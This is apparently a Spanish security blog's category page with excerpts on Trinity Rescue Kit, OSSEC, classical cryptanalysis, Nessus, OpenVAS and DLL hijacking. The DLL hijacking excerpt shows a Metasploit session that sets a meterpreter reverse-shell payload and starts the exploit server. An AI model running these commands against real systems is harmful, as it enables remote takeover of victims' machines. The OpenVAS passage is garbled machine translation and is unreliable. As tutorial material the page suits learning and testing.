Categoría: Herramientas seguridad
Herramientas seguridad
Recuperar contraseñas de Windows con Trinity Rescue Kit
Trinity Rescue Kit (TRK) es una distribución gratuita de Linux(Live CD) que sirve para recuperar y reparar PC’s cuyo sistema operativo es Windows, aunque también sirve para solucionar problemas en Linux
OSSEC – Sistema de Detecion de Intrusos Basado en Host
OSSEC es un proyecto open source de gestión de Logs, que monitoriza una máquina, y que detecta las anomalías que puedan producirse en ella. Para hacer esto utiliza herramientas para la detección de rootkits, para revisar la integridad de ficheros y ejecutables del sistema, y por último un potente sistema para analizar logs.
Introduccion a Criptoanalisis.
Este paper se me ocurrio escribirlo cuando encontre por internet un reto que planteaba el FBI, el cual se cifraba un determinado mensaje, con un algoritmo clasico. Ademas de que tambien he visto un reto similar llamado Crypto Badness el cual fue usado para la clasificacion de CTF en la DefCon.
Antes de comenzar me gustaria introducir sobre el Criptoanalisis, algo muy breve, aunque ya he escrito una introduccion a lo que respecta la Criptografia y sus comienzos en [http://confused.vndv.com/?cat=15].
Introduccion a Criptoanalisis: El criptoanalisis es un poco de ingenio y metodos de estudio, que se puede emplear ante un ‘texto cifrado’ para intentar obtener dicha informacion sin acceso. Podemos decir que es la forma de romper un codigo o sortear la seguridad.
El criptoanalisis clasico, en el cual me voy a basar en este paper, surgio aproximadamente por el siglo IX, X, el cual tomo mayor valor cuando un arabe llamado Sabbah Al-kindi, expuso en un manuscrito varias formas de descifrar mensajes criptograficos. Una de esos metodos se lo conoce como el Análisis de Frecuencias.
El Análisis de Frecuencia: Es una de los metodos criptograficos mas clasicos. Hay algo que tienen en comun muchos idiomas, muchos lenguajes, y es que estadisticamente, dependiendo cual sea este, ciertas letras del abecedario se repiten o tienen una frecuencia mayor que otras.
Critpografía basica: Cifrado por sustitución
Critpografía basica: Cifrado por sustitución
DLL Hijacking con Metasploit
Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.
Abrimos metasplit
rokitoh@red-orbita# msfconsolemsf > use exploit/windows/browser/webdav_dll_hijackermsf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»EXTENSIONS => grp p7c vcf wabmsf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111lhost => 192.168.1.111msf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.111:4444[*][*] Exploit links are now available at \192.168.1.111documents[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.111:80/
Instalar Nessus 4.2.2 en debian
Nessus es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Consiste en nessusd, el daemon Nessus, que realiza el escaneo en el sistema objetivo, y nessus, el cliente (basado en consola o gráfico) que muestra el avance y reporte de los escaneos. Desde consola nessus puede ser programado para hacer escaneos programados con cron.
Instalar OpenVAS 3.1 en Debian Lenny
¿Que es OpenVAS?
OpenVAS (Explorador del gravamen de la vulnerabilidad de OpenSource), previamente GNessUs, es a GLP bifurcación del Nessus explorador de la seguridad para no prohibir a futuro el desarrollo libre de la herramienta ahora-propietaria.
OpenVAS fue propuesto originalmente cerca pentesters en Seguridad de la computadora de Portcullis y entonces anunciado por Tim Brown encendidoSlashdot. OpenVAS es un proyecto del miembro de Software en el interés público[1]. Previamente, había sido votado hacia fuera porque el proyecto aparecía ser muerto.[2] Los dominios de OpenVAS fueron donados por SecuritySpace, el recibimiento fue donado por la Nth dimensión/el Internet público y los honorarios de conferencia de DevCon 1 eran pagados para cerca Intevation y Sistemas del DN.